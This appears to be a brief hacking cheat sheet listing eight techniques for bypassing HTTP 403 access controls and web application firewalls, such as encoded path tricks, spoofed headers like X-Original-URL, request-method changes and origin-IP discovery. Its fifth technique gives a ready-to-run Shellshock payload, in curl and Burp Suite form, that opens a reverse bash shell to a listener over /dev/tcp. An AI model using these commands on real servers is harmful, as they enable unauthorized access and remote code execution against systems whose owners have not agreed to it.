How to bypass 403 Errors

Technique number 1

• Appending {%2e} or {%2f} { **/*, /./} after the first slash
  • https://www.domain/DB = (opens in a new tab) 403
  • https://www.domain/%2e/DB] =200 (opens in a new tab)
  • https://www.domain/./DB] (opens in a new tab) =200

Technique number 2

• Adding headers to requests module.
  • Content-Length: 0
  • X-rewrite-url
  • X-Original-URL
  • X-Custom-IP-Authorization
  • X-Forwarded-For

Technique number3

• Change the request method
  • GET → POST
  • GET → TRACE
  • GET → PUT
  • GET → OPTIONS

Technique number 4

• Using Curl
  • curl -i -s -k -X $’GET’ -H $’Host: account.domain.com’ -H $’X-rewrite-url: admin/login’ $’https://account.domain.com/ (opens in a new tab)'

Technique number 5

• Brute force sub directory from the 403 directory
  • Try using (wordlist/dirb/comon.txt)
  • Setup Netcat lisener
  • Inject parameters from Curl or Burp Suite
  • CURL ---> curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1” http://192.168.2.18/cgi-bin/helloworld.cgi
  • Burp Suite ---> Change User-Agent: () { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1
  • More info ---> https://hackbotone.com/shellshock-attack-on-a-remote-web-server-d9124f4a0af3 (opens in a new tab)

Technique number 6

• Change Spelling
  • EX: ww2.example.com/admin
  • EX: www.example.com/ADMIN
  • EX: www.example.com/aDmin

Technique number 7

• Find Server IP address (Don't use the domain) ---> Directly go to IP, this will bypass the WAF

  • https://securitytrails.com/ (opens in a new tab) ---> Historique data of website IP

  • DNS Query

  • Using origin IP of the server

  • Firewall before the server

Technique number 8

• Change Injection Formula
  • Try changing the injection formula to see if you can bypass the WAF